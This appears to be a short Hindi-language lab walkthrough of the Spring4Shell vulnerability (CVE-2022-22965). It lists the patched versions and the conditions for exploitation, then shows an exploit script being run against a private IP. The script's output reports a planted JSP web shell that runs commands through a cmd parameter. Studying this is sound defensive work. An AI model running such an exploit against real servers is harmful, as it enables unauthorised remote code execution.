
Spring4Shell
Spring Framework 5.3.18 और 5.2.20
Spring Boot 2.6.6 और 2.5.12
Spring Core, Spring Framework का मुख्य घटक है। यह Spring Framework पारिस्थितिकी तंत्र में अन्य घटकों जैसे Spring MVC, Spring Boot, Spring WebFlux के निर्माण की नींव है। एक्सप्लॉइट कोड निम्नलिखित शर्तों के तहत निष्पादन योग्य है:
JDK 9 या उच्चतर
Apache Tomcat सर्वलेट कंटेनर चलाता है
WAR पैकेजिंग
पैकेज निर्भरताएँ: spring-webmvc या spring-webflux
यदि एप्लिकेशन को Spring Boot निष्पादन योग्य jar फ़ाइल के रूप में तैनात किया गया है, जैसा कि डिफ़ॉल्ट है, तो यह इस सुरक्षा दोष से प्रभावित नहीं होगा।
python CVE-2022-22965.py --url http://172.16.1.10:8080/helloworld/greeting
└─$ python cve-spring4shell.py --url http://172.16.1.10:8080/helloworld/greeting
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://172.16.1.10:8080/shell.jsp?cmd=id